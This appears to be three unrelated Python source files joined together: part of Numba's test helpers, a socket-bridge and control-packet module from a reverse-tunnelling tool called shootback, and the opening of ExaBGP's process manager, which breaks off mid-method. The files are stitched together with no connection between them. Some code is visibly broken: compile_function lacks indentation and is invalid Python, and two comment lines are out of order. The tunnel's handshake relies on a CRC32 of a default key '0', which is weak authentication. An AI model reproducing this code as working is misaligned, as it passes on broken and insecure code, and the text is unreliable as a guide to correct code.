        cr = compile_isolated(pyfunc, (), flags=flags)
        cfunc = cr.entry_point
        expected = pyfunc()
        got = cfunc()
        self.assertPreciseEqual(got, expected)
        return got, expected
class SerialMixin(object):
    """Mixin to mark test for serial execution.
    """
    # Flag read by the test runner: classes carrying this attribute set to
    # False are excluded from parallel test execution.
    _numba_parallel_test_ = False
# Various helpers
@contextlib.contextmanager
def override_config(name, value):
    """
    Return a context manager that temporarily sets Numba config variable
    *name* to *value*.  *name* must be the name of an existing variable
    in numba.config.
    """
    saved = getattr(config, name)
    setattr(config, name, value)
    try:
        yield
    finally:
        # Restore the previous value even if the block raised
        setattr(config, name, saved)
@contextlib.contextmanager
def override_env_config(name, value):
    """
    Return a context manager that temporarily sets an Numba config environment
    *name* to *value*.
    """
    saved = os.environ.get(name)
    os.environ[name] = value
    config.reload_config()

    try:
        yield
    finally:
        if saved is None:
            # The variable wasn't set before: remove it again
            del os.environ[name]
        else:
            # Restore the previous value
            os.environ[name] = saved
        # Always reload config
        config.reload_config()
def compile_function(name, code, globs):
"""
Given a *code* string, compile it with globals *globs* and return
the function named *name*.
"""
co = compile(code.rstrip(), "<string>", "single")
ns = {}
eval(co, globs, ns)
return ns[name]
def tweak_code(func, codestring=None, consts=None):
    """
    Tweak the code object of the given function by replacing its
    *codestring* (a bytes object) and *consts* tuple, optionally.
    """
    co = func.__code__
    if codestring is None:
        codestring = co.co_code
    if consts is None:
        consts = co.co_consts
    if hasattr(co, 'replace'):
        # BUG FIX: on Python 3.8+ the CodeType constructor grew a
        # `posonlyargcount` argument, so the positional call below raises
        # TypeError.  CodeType.replace() (3.8+) is immune to such
        # signature changes.
        new_code = co.replace(co_code=codestring, co_consts=consts)
    else:
        tp = type(co)
        if sys.version_info >= (3,):
            # Python 3.3 - 3.7 constructor signature
            new_code = tp(co.co_argcount, co.co_kwonlyargcount, co.co_nlocals,
                          co.co_stacksize, co.co_flags, codestring,
                          consts, co.co_names, co.co_varnames,
                          co.co_filename, co.co_name, co.co_firstlineno,
                          co.co_lnotab)
        else:
            # Python 2 constructor signature (no kwonlyargcount)
            new_code = tp(co.co_argcount, co.co_nlocals,
                          co.co_stacksize, co.co_flags, codestring,
                          consts, co.co_names, co.co_varnames,
                          co.co_filename, co.co_name, co.co_firstlineno,
                          co.co_lnotab)
    func.__code__ = new_code
# Shared "trashcan" directory where temporary test artifacts live until
# they become stale (see temp_directory() below).
_trashcan_dir = 'numba-tests'

if os.name == 'nt':
    # Under Windows, gettempdir() points to the user-local temp dir
    _trashcan_dir = os.path.join(tempfile.gettempdir(), _trashcan_dir)
else:
    # Mix the UID into the directory name to allow different users to
    # run the test suite without permission errors (issue #1586)
    _trashcan_dir = os.path.join(tempfile.gettempdir(),
                                 "%s.%s" % (_trashcan_dir, os.getuid()))

# Stale temporary directories are deleted after they are older than this value.
# The test suite probably won't ever take longer than this...
_trashcan_timeout = 24 * 3600  # 1 day
def _create_trashcan_dir():
    """Ensure the top-level trashcan directory exists."""
    try:
        os.mkdir(_trashcan_dir)
    except OSError as exc:
        # An already-existing directory is fine; anything else is real
        if exc.errno != errno.EEXIST:
            raise
def _purge_trashcan_dir():
    """Delete trashcan entries older than _trashcan_timeout."""
    cutoff = time.time() - _trashcan_timeout
    for entry in sorted(os.listdir(_trashcan_dir)):
        path = os.path.join(_trashcan_dir, entry)
        try:
            if os.stat(path).st_mtime < cutoff:
                shutil.rmtree(path, ignore_errors=True)
        except OSError:
            # In parallel testing, several processes can attempt to
            # remove the same entry at once, ignore.
            pass
def _create_trashcan_subdir(prefix):
    """Make a fresh subdirectory inside the trashcan, purging stale ones first."""
    _purge_trashcan_dir()
    return tempfile.mkdtemp(prefix=prefix + '-', dir=_trashcan_dir)
def temp_directory(prefix):
    """
    Create a temporary directory with the given *prefix* that will survive
    at least as long as this process invocation.  The temporary directory
    will be eventually deleted when it becomes stale enough.

    This is necessary because a DLL file can't be deleted while in use
    under Windows.

    An interesting side-effect is to be able to inspect the test files
    shortly after a test suite run.
    """
    # Make sure the parent trashcan exists, then hand out a fresh subdir
    _create_trashcan_dir()
    return _create_trashcan_subdir(prefix)
def import_dynamic(modname):
    """
    Import and return a module of the given name.  Care is taken to
    avoid issues due to Python's internal directory caching.
    """
    if sys.version_info >= (3, 3):
        # Invalidate finder caches so freshly created files are seen
        import importlib
        importlib.invalidate_caches()
    __import__(modname)
    return sys.modules[modname]
# From CPython
@contextlib.contextmanager
def captured_output(stream_name):
    """Return a context manager used by captured_stdout/stdin/stderr
    that temporarily replaces the sys stream *stream_name* with a StringIO."""
    original = getattr(sys, stream_name)
    setattr(sys, stream_name, utils.StringIO())
    try:
        yield getattr(sys, stream_name)
    finally:
        # Put the real stream back, whatever happened inside the block
        setattr(sys, stream_name, original)
def captured_stdout():
    """Capture the output of sys.stdout:

       with captured_stdout() as stdout:
           print("hello")
       self.assertEqual(stdout.getvalue(), "hello\n")
    """
    return captured_output("stdout")
def captured_stderr():
    """Capture the output of sys.stderr:

       with captured_stderr() as stderr:
           print("hello", file=sys.stderr)
       self.assertEqual(stderr.getvalue(), "hello\n")
    """
    return captured_output("stderr")
@contextlib.contextmanager
def capture_cache_log():
    """Capture stdout while Numba's DEBUG_CACHE logging is enabled."""
    with captured_stdout() as out, override_config('DEBUG_CACHE', True):
        yield out
class MemoryLeak(object):
    """Helper mixin that snapshots NRT allocation stats and asserts that
    every data and meminfo allocation was matched by a free."""

    __enable_leak_check = True

    def memory_leak_setup(self):
        # Clean up any NRT-backed objects hanging in a dead reference cycle
        gc.collect()
        self.__init_stats = rtsys.get_allocation_stats()

    def memory_leak_teardown(self):
        if self.__enable_leak_check:
            self.assert_no_memory_leak()

    def assert_no_memory_leak(self):
        before = self.__init_stats
        after = rtsys.get_allocation_stats()
        # Data allocations must balance out, and so must meminfo ones
        self.assertEqual(after.alloc - before.alloc,
                         after.free - before.free)
        self.assertEqual(after.mi_alloc - before.mi_alloc,
                         after.mi_free - before.mi_free)

    def disable_leak_check(self):
        # For per-test use when MemoryLeakMixin is injected into a TestCase
        self.__enable_leak_check = False
class MemoryLeakMixin(MemoryLeak):
    # Hooks MemoryLeak's bookkeeping into unittest's setUp/tearDown so that
    # every test in the class is automatically checked for NRT leaks.
    def setUp(self):
        super(MemoryLeakMixin, self).setUp()
        self.memory_leak_setup()
    def tearDown(self):
        super(MemoryLeakMixin, self).tearDown()
        # Collect cyclic garbage before comparing allocation stats
        gc.collect()
        self.memory_leak_teardown()
@contextlib.contextmanager
def forbid_codegen():
    """
    Forbid LLVM code generation during the execution of the context
    manager's enclosed block.

    If code generation is invoked, a RuntimeError is raised.
    """
    from numba.targets import codegen
    patchpoints = ['CodeLibrary._finalize_final_module']

    saved = {}

    def fail(*args, **kwargs):
        raise RuntimeError("codegen forbidden by test case")

    try:
        # XXX use the mock library instead?
        for patchpoint in patchpoints:
            parts = patchpoint.split('.')
            # Walk down to the object owning the attribute to patch
            target = codegen
            for part in parts[:-1]:
                target = getattr(target, part)
            attrname = parts[-1]
            original = getattr(target, attrname)
            assert callable(original), ("%r should be callable" % patchpoint)
            saved[target, attrname] = original
            setattr(target, attrname, fail)
        yield
    finally:
        # Restore every patched attribute
        for (target, attrname), original in saved.items():
            setattr(target, attrname, original)
# For details about redirection of file-descriptor, read
# https://eli.thegreenplace.net/2015/redirecting-all-kinds-of-stdout-in-python/
@contextlib.contextmanager
def redirect_fd(fd):
    """
    Temporarily redirect *fd* to a pipe's write end and return a file object
    wrapping the pipe's read end.
    """
    from numba import _helperlib
    libnumba = ctypes.CDLL(_helperlib.__file__)

    # Flush whatever C already buffered before swapping descriptors
    libnumba._numba_flush_stdout()
    saved_fd = os.dup(fd)
    read_end, write_end = os.pipe()
    try:
        os.dup2(write_end, fd)
        yield io.open(read_end, "r")
    finally:
        libnumba._numba_flush_stdout()
        os.close(write_end)
        # Restore the original descriptor and drop our duplicate
        os.dup2(saved_fd, fd)
        os.close(saved_fd)
def redirect_c_stdout():
    """Redirect C stdout
    """
    return redirect_fd(sys.__stdout__.fileno())
def run_in_new_process_caching(func, cache_dir_prefix=__name__, verbose=True):
    """Spawn a new process to run `func` with a temporary cache directory.

    The childprocess's stdout and stderr will be captured and redirected to
    the current process's stdout and stderr.

    Returns
    -------
    ret : dict
        exitcode: 0 for success. 1 for exception-raised.
        stdout: str
        stderr: str
    """
    ctx = mp.get_context('spawn')
    result_queue = ctx.Queue()
    cache_dir = temp_directory(cache_dir_prefix)
    with override_env_config('NUMBA_CACHE_DIR', cache_dir):
        child = ctx.Process(target=_remote_runner, args=[func, result_queue])
        child.start()
        child.join()
    stdout = result_queue.get_nowait()
    stderr = result_queue.get_nowait()
    if verbose and stdout.strip():
        print()
        print('STDOUT'.center(80, '-'))
        print(stdout)
    if verbose and stderr.strip():
        print(file=sys.stderr)
        print('STDERR'.center(80, '-'), file=sys.stderr)
        print(stderr, file=sys.stderr)
    return {
        'exitcode': child.exitcode,
        'stdout': stdout,
        'stderr': stderr,
    }
def _remote_runner(fn, qout):
    """Used by `run_in_new_process_caching()`

    Runs *fn* in this (child) process, pushes its captured stdout then
    stderr onto *qout*, and exits with code 0 on success or 1 if *fn*
    raised.
    """
    with captured_stderr() as stderr:
        with captured_stdout() as stdout:
            try:
                fn()
            except Exception:
                # BUG FIX: `traceback` was used here without ever being
                # imported in this module, so any failure of *fn* raised
                # NameError instead of being reported; import it locally.
                import traceback
                traceback.print_exc()
                exitcode = 1
            else:
                exitcode = 0
        qout.put(stdout.getvalue())
    qout.put(stderr.getvalue())
    sys.exit(exitcode)
|
common_func.py | #!/usr/bin/env python
# coding=utf-8
from __future__ import print_function, unicode_literals, division, absolute_import
import sys
import time
import binascii
import struct
import collections
import logging
import socket
import select
import threading
import traceback
import functools
try:
# for pycharm type hinting
from typing import Union, Callable
except:
pass
# socket recv buffer, 16384 bytes
RECV_BUFFER_SIZE = 2 ** 14
# default secretkey, use -k/--secretkey to change
SECRET_KEY = "0"
# how long a SPARE slaver would keep
#   once a slaver received a heart-beat package from master,
#   the TTL would be reset. And heart-beat delay is less than TTL,
#   so, theoretically, a spare slaver never times out,
#   except on network failure
# notice: a working slaver would NEVER timeout
SPARE_SLAVER_TTL = 300
# internal program version, appears in CtrlPkg
INTERNAL_VERSION = 0x000D
# version for human readable (major, minor, patch, internal revision)
__version__ = (2, 2, 8, INTERNAL_VERSION)
# just a logger
log = logging.getLogger(__name__)
def version_info():
    """get program version for human. eg: "2.1.0-r2" """
    major, minor, patch, revision = __version__
    return "{}.{}.{}-r{}".format(major, minor, patch, revision)
def configure_logging(level):
    """Configure the root logger's verbosity and message format."""
    fmt = '[%(levelname)s %(asctime)s] %(message)s'
    logging.basicConfig(level=level, format=fmt)
def fmt_addr(socket):
    """(host, int(port)) --> "host:port" """
    template = "{}:{}"
    return template.format(*socket)
def split_host(x):
    """ "host:port" --> (host, int(port))"""
    try:
        host, port_text = x.split(":")
        port = int(port_text)
    except:
        # anything wrong (no colon, too many colons, non-numeric port)
        raise ValueError(
            "wrong syntax, format host:port is "
            "required, not {}".format(x))
    return host, port
def try_close(closable):
    """Best-effort close: call .close() and swallow any error.

    Equivalent to:
        try:
            connection.close()
        except:
            pass
    """
    try:
        closable.close()
    except:
        pass
def select_recv(conn, buff_size, timeout=None):
    """add timeout for socket.recv()
    :type conn: socket.SocketType
    :type buff_size: int
    :type timeout: float
    :rtype: Union[bytes, None]
    """
    readable, _, _ = select.select([conn], [], [], timeout)
    if not readable:
        # nothing became readable before the deadline
        raise RuntimeError("recv timeout")

    data = conn.recv(buff_size)
    if not data:
        # zero-length read means the peer closed the connection
        raise RuntimeError("received zero bytes, socket was closed")
    return data
class SocketBridge:
    """
    transfer data between sockets

    Socket pairs are registered via add_conn_pair(); a single select()
    loop then pumps bytes both ways until one side closes, after which
    the pair is shut down, closed and the optional callback fires.
    """
    def __init__(self):
        self.conn_rd = set()  # record readable-sockets
        self.map = {}  # record sockets pairs
        self.callbacks = {}  # record callbacks

    def add_conn_pair(self, conn1, conn2, callback=None):
        """
        transfer anything between two sockets
        :type conn1: socket.SocketType
        :type conn2: socket.SocketType
        :param callback: callback in connection finish
        :type callback: Callable
        """
        # mark as readable
        self.conn_rd.add(conn1)
        self.conn_rd.add(conn2)
        # record sockets pairs
        self.map[conn1] = conn2
        self.map[conn2] = conn1
        # record callback
        if callback is not None:
            self.callbacks[conn1] = callback

    def start_as_daemon(self):
        # run the bridge loop in a background daemon thread
        t = threading.Thread(target=self.start)
        t.daemon = True
        t.start()
        log.info("SocketBridge daemon started")
        return t

    def start(self):
        # supervisor loop: restart _start() if it ever crashes
        while True:
            try:
                self._start()
            except:
                log.error("FATAL ERROR! SocketBridge failed {}".format(
                    traceback.format_exc()
                ))

    def _start(self):
        # memoryview act as an recv buffer
        # refer https://docs.python.org/3/library/stdtypes.html#memoryview
        buff = memoryview(bytearray(RECV_BUFFER_SIZE))
        while True:
            if not self.conn_rd:
                # sleep if there is no connections
                time.sleep(0.06)
                continue
            # blocks until there is socket(s) ready for .recv
            # notice: sockets which were closed by remote,
            #   are also regarded as read-ready by select()
            r, w, e = select.select(self.conn_rd, [], [], 0.5)
            for s in r:  # iter every read-ready or closed sockets
                try:
                    # here, we use .recv_into() instead of .recv()
                    # recv data directly into the pre-allocated buffer
                    # to avoid many unnecessary malloc()
                    # see https://docs.python.org/3/library/socket.html#socket.socket.recv_into
                    rec_len = s.recv_into(buff, RECV_BUFFER_SIZE)
                except:
                    # unable to read, in most cases, it's due to socket close
                    self._rd_shutdown(s)
                    continue
                if not rec_len:
                    # read zero size, closed or shutdowned socket
                    self._rd_shutdown(s)
                    continue
                try:
                    # send data, we use `buff[:rec_len]` slice because
                    # only the front of buff is filled
                    # NOTE(review): .send() may transmit fewer than rec_len
                    #   bytes on a congested socket, silently dropping the
                    #   remainder; .sendall() would be lossless -- TODO
                    #   confirm before changing behavior
                    self.map[s].send(buff[:rec_len])
                except:
                    # unable to send, close connection
                    self._rd_shutdown(s)
                    continue

    def _rd_shutdown(self, conn, once=False):
        """action when connection should be read-shutdown
        :type conn: socket.SocketType
        :param once: internal flag to stop the rd/wr shutdown recursion
        """
        if conn in self.conn_rd:
            self.conn_rd.remove(conn)
        try:
            conn.shutdown(socket.SHUT_RD)
        except:
            pass
        if not once and conn in self.map:  # use the `once` param to avoid infinite loop
            # if a socket is rd_shutdowned, then it's
            #   pair should be wr_shutdown.
            self._wr_shutdown(self.map[conn], True)
        if self.map.get(conn) not in self.conn_rd:
            # if both two connection pair was rd-shutdowned,
            #   this pair sockets are regarded to be completed
            #   so we gonna close them
            self._tterminate(conn)

    def _wr_shutdown(self, conn, once=False):
        """action when connection should be write-shutdown
        :type conn: socket.SocketType
        :param once: internal flag to stop the wr/rd shutdown recursion
        """
        try:
            conn.shutdown(socket.SHUT_WR)
        except:
            pass
        if not once and conn in self.map:  # use the `once` param to avoid infinite loop
            # pair should be rd_shutdown.
            # if a socket is wr_shutdowned, then it's
            self._rd_shutdown(self.map[conn], True)

    def _tterminate(self, conn):
        """terminate a sockets pair (two socket)
        :type conn: socket.SocketType
        :param conn: any one of the sockets pair
        """
        try_close(conn)  # close the first socket
        # ------ close and clean the mapped socket, if exist ------
        if conn in self.map:
            _mapped_conn = self.map[conn]
            try_close(_mapped_conn)
            if _mapped_conn in self.map:
                del self.map[_mapped_conn]
            del self.map[conn]  # clean the first socket
        else:
            _mapped_conn = None  # just a fallback
        # ------ callback --------
        # because we are not sure which socket are assigned to callback,
        #   so we should try both
        if conn in self.callbacks:
            try:
                self.callbacks[conn]()
            except Exception as e:
                log.error("traceback error: {}".format(e))
                log.debug(traceback.format_exc())
            del self.callbacks[conn]
        elif _mapped_conn and _mapped_conn in self.callbacks:
            try:
                self.callbacks[_mapped_conn]()
            except Exception as e:
                log.error("traceback error: {}".format(e))
                log.debug(traceback.format_exc())
            del self.callbacks[_mapped_conn]
class CtrlPkg:
    """Control package of shootback: handshake and heartbeat.

    Wire layout -- 64 bytes total (PACKAGE_SIZE), big-endian, FORMAT_PKG:

        size  name      type            description
        1     pkg_ver   unsigned char   package format version *1
        1     pkg_type  signed char     package type *2
        2     prgm_ver  unsigned short  program version *3
        20    N/A       N/A             reserved
        40    data      bytes           payload area *4

    *1: package format version; currently only 0x01 exists.
    *2: package type.  Apart from the heartbeat, negative types are sent
        by the Slaver and positive types by the Master:
          -1: Slaver-->Master handshake response  (PTYPE_HS_S2M)
           0: heartbeat                           (PTYPE_HEART_BEAT)
          +1: Master-->Slaver handshake           (PTYPE_HS_M2S)
    *3: defaults to INTERNAL_VERSION.
    *4: the payload layout is defined per package type (FORMATS_DATA):

        type -1 (Slaver-->Master handshake response):
            4 bytes: crc32_s2m, unsigned int, simple auth token,
                     CRC32(reversed(SECRET_KEY)); the rest is padding.
            NOTE: the -1 handshake hashes the *reversed* SECRET_KEY,
                  while the +1 handshake hashes it unreversed.

        type 0 (heartbeat): empty payload.

        type +1 (Master-->Slaver handshake):
            4 bytes: crc32_m2s, unsigned int, simple auth token,
                     CRC32(SECRET_KEY); the rest is padding.
    """
    PACKAGE_SIZE = 2 ** 6  # 64 bytes
    CTRL_PKG_TIMEOUT = 5  # CtrlPkg recv timeout, in second
    # CRC32 for SECRET_KEY and Reversed(SECRET_KEY)
    SECRET_KEY_CRC32 = binascii.crc32(SECRET_KEY.encode('utf-8')) & 0xffffffff
    SECRET_KEY_REVERSED_CRC32 = binascii.crc32(SECRET_KEY[::-1].encode('utf-8')) & 0xffffffff
    # Package Type
    PTYPE_HS_S2M = -1  # handshake pkg, slaver to master
    PTYPE_HEART_BEAT = 0  # heart beat pkg
    PTYPE_HS_M2S = +1  # handshake pkg, Master to Slaver
    TYPE_NAME_MAP = {
        PTYPE_HS_S2M: "PTYPE_HS_S2M",
        PTYPE_HEART_BEAT: "PTYPE_HEART_BEAT",
        PTYPE_HS_M2S: "PTYPE_HS_M2S",
    }
    # formats
    # see https://docs.python.org/3/library/struct.html#format-characters
    # for format syntax
    FORMAT_PKG = "!b b H 20x 40s"
    FORMATS_DATA = {
        PTYPE_HS_S2M: "!I 36x",
        PTYPE_HEART_BEAT: "!40x",
        PTYPE_HS_M2S: "!I 36x",
    }
    _cache_prebuilt_pkg = {}  # cache for _prebuilt_pkg(), keyed by pkg_type

    def __init__(self, pkg_ver=0x01, pkg_type=0,
                 prgm_ver=INTERNAL_VERSION, data=(),
                 raw=None,
                 ):
        """do not call this directly, use `CtrlPkg.pbuild_*` instead"""
        self.pkg_ver = pkg_ver
        self.pkg_type = pkg_type
        self.prgm_ver = prgm_ver
        self.data = data
        if raw:
            # already-serialized packet (e.g. from decode_only)
            self.raw = raw
        else:
            self._build_bytes()

    @property
    def type_name(self):
        """Return a human-readable name for this package's type."""
        return self.TYPE_NAME_MAP.get(self.pkg_type, "TypeUnknown")

    def __str__(self):
        return """pkg_ver: {} pkg_type:{} prgm_ver:{} data:{}""".format(
            self.pkg_ver,
            self.type_name,
            self.prgm_ver,
            self.data,
        )

    def __repr__(self):
        return self.__str__()

    def _build_bytes(self):
        """Serialize this package into the 64-byte ``self.raw``."""
        self.raw = struct.pack(
            self.FORMAT_PKG,
            self.pkg_ver,
            self.pkg_type,
            self.prgm_ver,
            self.data_encode(self.pkg_type, self.data),
        )

    @classmethod
    def _prebuilt_pkg(cls, pkg_type, fallback):
        """act as lru_cache: build once per pkg_type, then reuse"""
        if pkg_type not in cls._cache_prebuilt_pkg:
            pkg = fallback(force_rebuilt=True)
            cls._cache_prebuilt_pkg[pkg_type] = pkg
        return cls._cache_prebuilt_pkg[pkg_type]

    @classmethod
    def recalc_crc32(cls):
        """Re-derive the auth tokens after SECRET_KEY has been changed."""
        cls.SECRET_KEY_CRC32 = binascii.crc32(SECRET_KEY.encode('utf-8')) & 0xffffffff
        cls.SECRET_KEY_REVERSED_CRC32 = binascii.crc32(SECRET_KEY[::-1].encode('utf-8')) & 0xffffffff
        # BUGFIX: the prebuilt handshake packages embed the *old* tokens;
        # drop them so the next pbuild_* call rebuilds with the new key,
        # otherwise stale handshakes would be sent after a key change.
        cls._cache_prebuilt_pkg.clear()

    @classmethod
    def data_decode(cls, ptype, data_raw):
        """Unpack the 40-byte payload area according to the package type."""
        return struct.unpack(cls.FORMATS_DATA[ptype], data_raw)

    @classmethod
    def data_encode(cls, ptype, data):
        """Pack ``data`` into the 40-byte payload area for the package type."""
        return struct.pack(cls.FORMATS_DATA[ptype], *data)

    def verify(self, pkg_type=None):
        """Verify this package's auth token (and optionally its type).

        :param pkg_type: when given, the package must also be of this type
        :return: True when the package is acceptable
        """
        try:
            if pkg_type is not None and self.pkg_type != pkg_type:
                return False
            elif self.pkg_type == self.PTYPE_HS_S2M:
                # Slaver-->Master handshake response
                return self.data[0] == self.SECRET_KEY_REVERSED_CRC32
            elif self.pkg_type == self.PTYPE_HEART_BEAT:
                # heartbeat: nothing to check
                return True
            elif self.pkg_type == self.PTYPE_HS_M2S:
                # Master-->Slaver handshake
                return self.data[0] == self.SECRET_KEY_CRC32
            else:
                return True
        except Exception:
            # malformed payload (e.g. empty data tuple); narrowed from a
            # bare except so KeyboardInterrupt/SystemExit still propagate
            return False

    @classmethod
    def decode_only(cls, raw):
        """
        decode raw bytes to CtrlPkg instance, no verify
        use .decode_verify() if you also want verify
        :param raw: raw bytes content of package
        :type raw: bytes
        :rtype: CtrlPkg
        :raises ValueError: when `raw` is not exactly PACKAGE_SIZE bytes
        """
        if not raw or len(raw) != cls.PACKAGE_SIZE:
            raise ValueError("content size should be {}, but {}".format(
                cls.PACKAGE_SIZE, len(raw)
            ))
        pkg_ver, pkg_type, prgm_ver, data_raw = struct.unpack(cls.FORMAT_PKG, raw)
        # per-packet detail: debug level, not info (this runs for every
        # control package received, including heartbeats)
        logging.debug("CtrlPkg,decode_only,,,,pkg_ver:{}, pkg_type:{}, prgm_ver:{}".format(pkg_ver, pkg_type, prgm_ver))
        data = cls.data_decode(pkg_type, data_raw)
        return cls(
            pkg_ver=pkg_ver, pkg_type=pkg_type,
            prgm_ver=prgm_ver,
            data=data,
            raw=raw,
        )

    @classmethod
    def decode_verify(cls, raw, pkg_type=None):
        """decode and verify a package
        :param raw: raw bytes content of package
        :type raw: bytes
        :param pkg_type: assert this package's type,
            if type not match, would be marked as wrong
        :type pkg_type: int
        :rtype: CtrlPkg, bool
        :return: tuple(CtrlPkg, is_it_a_valid_package)
        """
        try:
            pkg = cls.decode_only(raw)
        except Exception:
            # undecodable bytes are simply "not a valid package"
            return None, False
        else:
            return pkg, pkg.verify(pkg_type=pkg_type)

    @classmethod
    def pbuild_hs_m2s(cls, force_rebuilt=False):
        """pkg build: Handshake Master to Slaver"""
        # because py27 do not have functools.lru_cache, so we must write our own
        if force_rebuilt:
            return cls(
                pkg_type=cls.PTYPE_HS_M2S,
                data=(cls.SECRET_KEY_CRC32,),
            )
        else:
            return cls._prebuilt_pkg(cls.PTYPE_HS_M2S, cls.pbuild_hs_m2s)

    @classmethod
    def pbuild_hs_s2m(cls, force_rebuilt=False):
        """pkg build: Handshake Slaver to Master"""
        if force_rebuilt:
            return cls(
                pkg_type=cls.PTYPE_HS_S2M,
                data=(cls.SECRET_KEY_REVERSED_CRC32,),
            )
        else:
            return cls._prebuilt_pkg(cls.PTYPE_HS_S2M, cls.pbuild_hs_s2m)

    @classmethod
    def pbuild_heart_beat(cls, force_rebuilt=False):
        """pkg build: Heart Beat Package"""
        if force_rebuilt:
            return cls(
                pkg_type=cls.PTYPE_HEART_BEAT,
            )
        else:
            return cls._prebuilt_pkg(cls.PTYPE_HEART_BEAT, cls.pbuild_heart_beat)

    @classmethod
    def recv(cls, sock, timeout=CTRL_PKG_TIMEOUT, expect_ptype=None):
        """just a shortcut function: recv one CtrlPkg from a socket
        :param sock: which socket to recv CtrlPkg from
        :type sock: socket.SocketType
        :param timeout: recv timeout in seconds
        :param expect_ptype: optional PTYPE_* the package must match
        :rtype: CtrlPkg,bool
        """
        # per-packet detail: debug level, not info (heartbeats arrive
        # continuously and would flood the info log)
        logging.debug("CtrlPkg,recv,sock:{},expect_ptype:{}".format(sock, expect_ptype))
        buff = select_recv(sock, cls.PACKAGE_SIZE, timeout)
        pkg, verify = CtrlPkg.decode_verify(buff, pkg_type=expect_ptype)  # type: CtrlPkg,bool
        return pkg, verify
|
processes.py | """
process.py
Created by Thomas Mangin on 2011-05-02.
Copyright (c) 2009-2017 Exa Networks. All rights reserved.
License: 3-clause BSD. (See the COPYRIGHT file)
"""
import os
import errno
import time
import subprocess
import select
import fcntl
from exabgp.util import str_ascii
from exabgp.util import bytes_ascii
from exabgp.util.errstr import errstr
from exabgp.reactor.network.error import error
from exabgp.configuration.core.format import formated
from exabgp.reactor.api.response import Response
from exabgp.reactor.api.response.answer import Answer
from exabgp.bgp.message import Message
from exabgp.logger import Logger
from exabgp.version import json as json_version
from exabgp.version import text as text_version
from exabgp.configuration.environment import environment
from threading import Thread
# pylint: disable=no-self-argument,not-callable,unused-argument,invalid-name
class ProcessError(Exception):
    """Raised when a helper API process cannot be started or written to."""
    pass
def preexec_helper():
    """Run in the forked child just before exec (subprocess preexec_fn)."""
    # make this process a new process group
    # os.setsid()
    # This prevents signals from being sent to the children (and creates a new process group)
    os.setpgrp()
    # signal.signal(signal.SIGINT, signal.SIG_IGN)
class Processes(object):
    """Manage the external helper processes configured through the API.

    Responsibilities visible in this class: spawning helpers with
    subprocess.Popen (non-blocking stdout), throttled respawning of dead
    helpers, draining their stdout line-by-line (received()), writing
    encoded API messages to their stdin (write()), and fanning BGP events
    out to the helpers registered for them (the @silenced notifiers and
    the register_process dispatch table).
    """
    # how many times a process can respawn in the time interval
    respawn_timemask = 0xFFFFFF - 0b111111
    # '0b111111111111111111000000' (around a minute, 63 seconds)
    _dispatch = {}
    def __init__(self):
        self.logger = Logger()
        self.clean()
        self.silence = False
        self._buffer = {}
        self._configuration = {}
        self._restart = {}
        # respawn_number == 0 disables respawning entirely
        self.respawn_number = 5 if environment.settings().api.respawn else 0
        self.terminate_on_error = environment.settings().api.terminate
        self.ack = environment.settings().api.ack
    def number(self):
        """Return the number of currently running helper processes."""
        return len(self._process)
    def clean(self):
        """Reset all per-process bookkeeping (does not kill anything)."""
        self.fds = []
        self._process = {}
        self._encoder = {}
        self._broken = []
        self._respawning = {}
    def _handle_problem(self, process):
        """React to a dead/hung helper: restart it if allowed, else drop it."""
        if process not in self._process:
            return
        if self.respawn_number and self._restart[process]:
            self.logger.debug('process %s ended, restarting it' % process, 'process')
            self._terminate(process)
            self._start(process)
        else:
            self.logger.debug('process %s ended' % process, 'process')
            self._terminate(process)
    def _terminate(self, process_name):
        """Remove a helper from the bookkeeping and kill it in a thread.

        Returns the Thread doing the terminate/wait so callers may join it.
        """
        self.logger.debug('terminating process %s' % process_name, 'process')
        process = self._process[process_name]
        del self._process[process_name]
        self._update_fds()
        # terminate()/wait() can block, so it is done off the main loop
        thread = Thread(target=self._terminate_run, args=(process,))
        thread.start()
        return thread
    def _terminate_run(self, process):
        """Thread target: terminate the Popen object and reap it."""
        try:
            process.terminate()
            process.wait()
        except (OSError, KeyError):
            # the process is most likely already dead
            pass
    def terminate(self):
        """Shut down every helper: send the encoder's shutdown message, then kill."""
        for process in list(self._process):
            if not self.silence:
                try:
                    self.write(process, self._encoder[process].shutdown())
                except ProcessError:
                    pass
        self.silence = True
        # waiting a little to make sure IO is flushed to the pipes
        # we are using unbuffered IO but still ..
        time.sleep(0.1)
        for process in list(self._process):
            try:
                t = self._terminate(process)
                t.join()
            except OSError:
                # we most likely received a SIGTERM signal and our child is already dead
                self.logger.debug('child process %s was already dead' % process, 'process')
        self.clean()
    def _start(self, process):
        """Spawn one configured helper, with respawn-rate throttling.

        Respawns are counted per ~63-second bucket (time masked with
        respawn_timemask); more than respawn_number deaths in one bucket
        raises ProcessError.
        """
        if not self._restart.get(process, True):
            return
        try:
            if process in self._process:
                self.logger.debug('process already running', 'process')
                return
            if process not in self._configuration:
                self.logger.debug('can not start process, no configuration for it', 'process')
                return
            # Prevent some weird termcap data to be created at the start of the PIPE
            # \x1b[?1034h (no-eol) (esc)
            os.environ['TERM'] = 'dumb'
            configuration = self._configuration[process]
            run = configuration.get('run', '')
            if run:
                api = configuration.get('encoder', '')
                self._encoder[process] = Response.Text(text_version) if api == 'text' else Response.JSON(json_version)
                self._process[process] = subprocess.Popen(
                    run,
                    stdin=subprocess.PIPE,
                    stdout=subprocess.PIPE,
                    preexec_fn=preexec_helper
                    # This flags exists for python 2.7.3 in the documentation but on on my MAC
                    # creationflags=subprocess.CREATE_NEW_PROCESS_GROUP
                )
                self._update_fds()
                # stdout is drained opportunistically from the event loop,
                # so it must not block
                fcntl.fcntl(self._process[process].stdout.fileno(), fcntl.F_SETFL, os.O_NONBLOCK)
                self.logger.debug('forked process %s' % process, 'process')
                self._restart[process] = self._configuration[process]['respawn']
                around_now = int(time.time()) & self.respawn_timemask
                if process in self._respawning:
                    if around_now in self._respawning[process]:
                        self._respawning[process][around_now] += 1
                        # we are respawning too fast
                        if self._respawning[process][around_now] > self.respawn_number:
                            self.logger.critical(
                                'Too many death for %s (%d) terminating program' % (process, self.respawn_number),
                                'process',
                            )
                            raise ProcessError()
                    else:
                        # reset long time since last respawn
                        self._respawning[process] = {around_now: 1}
                else:
                    # record respawing
                    self._respawning[process] = {around_now: 1}
        except (subprocess.CalledProcessError, OSError, ValueError) as exc:
            self._broken.append(process)
            self.logger.debug('could not start process %s' % process, 'process')
            self.logger.debug('reason: %s' % str(exc), 'process')
    def start(self, configuration, restart=False):
        """Synchronise running helpers with `configuration`.

        Helpers no longer configured are terminated; configured helpers are
        (re)started, killing the old instance first when restart is True.
        """
        for process in list(self._process):
